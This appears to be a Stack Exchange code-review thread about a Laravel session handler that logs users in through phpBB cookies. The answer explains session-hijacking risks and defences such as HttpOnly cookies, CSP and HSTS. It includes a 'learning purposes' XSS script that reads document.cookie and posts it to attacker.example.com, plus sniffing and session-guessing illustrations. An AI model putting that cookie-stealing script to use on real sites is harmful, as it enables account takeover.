# Laravel session handler for Phpbb sessions

Tags: php, laravel

Ok, so I am developing a Laravel 5.5 app that needs to interface with an existing phpBB forum.  Specifically, if you log into the phpBB forum, you must also be logged into the Laravel app.  Otherwise, users will have to log into both separately, and I feel that would be terrible user experience for my site.  The forums exist already and have a database of users as well as extensive functionality for user creation, logging in, administration, roles & permissions, etc, so rather than build all that, I'd like phpBB to handle most of the heavy lifting.

That's why I implemented this <strike>hacky</strike> custom session handler in Laravel (which works):

```
class PhpbbSessionHandler implements SessionHandlerInterface
{
    private function getPhpbbSessionId() {
        $key = config('session.phpbb_cookie');
        return isset($_COOKIE[$key]) ? $_COOKIE[$key] : null;
    }

    protected function getLaravelSessionQuery($id) {
        return DB::table( config('session.table') )->where('laravel_session_id', $id);
    }

    protected function getBBSessionQuery() {
        return DB::table( config('session.table') )
                ->where( 'session_id', $this->getPhpbbSessionId() )
                ->where( 'session_user_id', '!=', config('session.phpbb_anonymous') );
    }

    // Needed for interface
    public function open($savePath, $sessionName) {}
    public function close() {}

    /**
     * Look for existing session in Laravel, then phpBB
     */
    public function read($sessionId) {
        $session = $this->getLaravelSessionQuery($sessionId)->first();

        if($session) {
            // We are logged in, set the authenticated user
            $user = User::find($session->session_user_id);
            Auth::setUser($user);

            return ($session->payload) ? base64_decode($session->payload) : null;
        }
        else {
            // The forum is logged in, but Laravel is not. Let's log them in.
            $bb_user_id = $this->getBBSessionQuery()->value('session_user_id');

            if($bb_user_id) {
                Auth::loginUsingId($bb_user_id);
            }

            return;
        }
    }

    /**
     * Update session data
     */
    public function write($sessionId, $data) {
        $update['payload'] = base64_encode($data);

        if( $this->getLaravelSessionQuery($sessionId)->exists() ) {
            return $this->getLaravelSessionQuery($sessionId)->update($update);
        }
        else {
            $update['laravel_session_id'] = $sessionId;
            return $this->getBBSessionQuery()->update($update);
        }
    }

    public function destroy($sessionId) {
        return $this->getLaravelSessionQuery($sessionId)->delete();
    }

    /**
     * Clear out expired session records
     */
    public function gc($lifetime) {
        return DB::table( config('session.table') )->where('session_time', '<', $lifetime)->delete();
    }
}
```

The part I'd really like feedback on is the `read` method. It definitely is vulnerable to session hijacking, but without messing around deep in the lowest levels of phpBB source code, or implementing encryption that both apps can handle exactly the same, I'm not sure what to do.  This is already deeper into Laravel than I usually go, so any constructive feedback would be appreciated.

Answer (score 2):

#### Breaking Down the Essentials

##### Getting the Session ID from phpBB

Get the unique session ID from a user's browser cookie – the key to knowing who's who in phpBB.

```php
private function getPhpbbSessionId() {
    $key = config('session.phpbb_cookie');
    return isset($_COOKIE[$key]) ? $_COOKIE[$key] : null;
}
```

##### Setting Up the Queries

Get session details from Laravel's and phpBB:

```php
protected function getLaravelSessionQuery($id) {...}

protected function getBBSessionQuery() {...}
```

##### Session Synchronization Process

Opening and Closing Sessions. These are placeholder implementations required by `SessionHandlerInterface.`

```php
public function open($savePath, $sessionName) {
    // Managed elsewhere
}

public function close() {
    // Place for cleanup, if needed
}
```

##### Reading Session Data

Determine if the user is already logged in to Laravel or phpBB and ensure it stays logged in across both.

```php
public function read($sessionId) {
    $session = $this->getLaravelSessionQuery($sessionId)->first();
    if ($session) {...} else {
        $bb_user_id = $this->getBBSessionQuery()->value('session_user_id');
        if ($bb_user_id) {...}
        return;
    }
}
```

##### Save or Update Session

Updates the session data in the database for Laravel or phpBB sessions.

```php
public function write($sessionId, $data) {...} else {...}
```

##### Destroy Session

Delete a session from the Laravel session table.

```php
public function destroy($sessionId) {...}
```

##### Clean up

Remove expired sessions from the database.

```php
public function gc($lifetime) {
    return DB::table(config('session. Table'))
             ->where('session_time', '<', $lifetime)->delete();
}
```

#### Keeping Session Information Safe

The method `getPhpbbSessionId()` looks for a session ID in a cookie saved on the user's device (`$_COOKIE[$key]`). This method is insecure because it trusts information stored on the client's side. If a bad actor out the session ID (through tricks like XSS attacks, session sniffing, or session fixation), they can impersonate the user.

**Bad Scenario (for learning purposes only)**
Here's an example of how the user's cookies, including this with session ID, can be stolen and sent to the attacker's Server.

```html
<script>
    // Just a made-up example for learning
    var userSessionCookie = document.cookie; // Takes the user's cookies
    var attackerServerURL = 'https://attacker.example.com/steal-session';
    
    // Sends the cookies to the malicious actor's Server
    fetch(attackerServerURL, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({cookie: userSessionCookie}),
    });
</script>
```

##### How to Prevent This

1. **Make Cookies HttpOnly and Secure**: Ensure the cookies that hold session info are tagged as `HttpOnly` and `Secure`. `HttpOnly` keeps JavaScript from seeing the cookie, which helps prevent XSS attacks. `Secure` means cookies will only be sent over secure HTTPS connections, lowering the chance of someone else grabbing the data on an unprotected network.
2. **Content Security Policy (CSP)**: A strong CSP can also help mitigate the risk of XSS attacks by controlling which resources (like JavaScript, CSS, etc.) can load and run on your site.
3. **Use CSRF Tokens**: Protect against Cross-Site Request Forgery (CSRF) by including a secret, hard-to-guess token with requests that change things. This token should be checked on the Server.
4. **Often Change Session IDs**: Change session IDs after logging in to prevent session fixation attacks.

#### Risky Cookies

Cookies for sessions that aren't locked down with the `Secure` flag can be sent over unencrypted connections (HTTP), which makes it easy for attackers to grab them, especially on open Wi-Fi networks.

**Bad Scenario**
Imagine a user on a public Wi-Fi network at a coffee shop or airport.

**A Simple Look at Packet Sniffing**:

```
What the Attacker Sees:
GET /index.php HTTP/1.1
Host: vulnerable-app.com
Cookie: PHPSESSID=123456789; othercookie=value;

[The attacker takes the PHPSESSID value]
```

##### How to Prevent This

1. **Always Use HTTPS**: Use HTTPS everywhere in your app to ensure encryption of all communication between the user and the Server.
2. **Secure Your Cookies**: Set the `Secure` flag on all cookies, which tells the browser to only send the cookie over HTTPS, keeping it away from unencrypted HTTP.
3. **Enforce HSTS**: Use HTTP Strict Transport Security (HSTS) to make browsers stick to HTTPS and prevent attempts to switch back to less secure HTTP.

**Predictable Sessions**
The problem is with session ID, which is easy to guess if an attacker can predict a session ID and set their cookie to this value, hijacking the Session.

**Bad Scenario**
An attacker notices that session IDs follow a simple pattern (like increasing numbers), so they can guess another user's session ID who logged in before or after.

**Understanding Session Prediction**:

```
What the Attacker Figures Out: PHPSESSID=1000
[The attacker guesses the next Session]
Their Guess: PHPSESSID=1001

[Then, they use PHPSESSID=1001 as their cookie]
```

##### Solutions

1. **Random, Secure Session IDs**: Create session IDs with secure, cryptographic methods that give random, hard-to-guess numbers.
2. **Check Sessions Properly**: Don't just see if a session ID exists; look at the user's IP address and browser to catch any fishy activity.
3. **Refresh Session IDs Often**: Create new session IDs, particularly after login or significant changes, to prevent attacks in which someone tries to guess them.